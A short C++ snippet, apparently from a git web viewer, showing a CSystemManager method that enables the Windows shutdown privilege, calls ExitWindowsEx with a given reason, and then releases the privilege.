void CSystemManager::ShutdownWindows( DWORD dwReason )
{
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(dwReason, 0);
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
}
Reference in New Issue View Git Blame Copy Permalink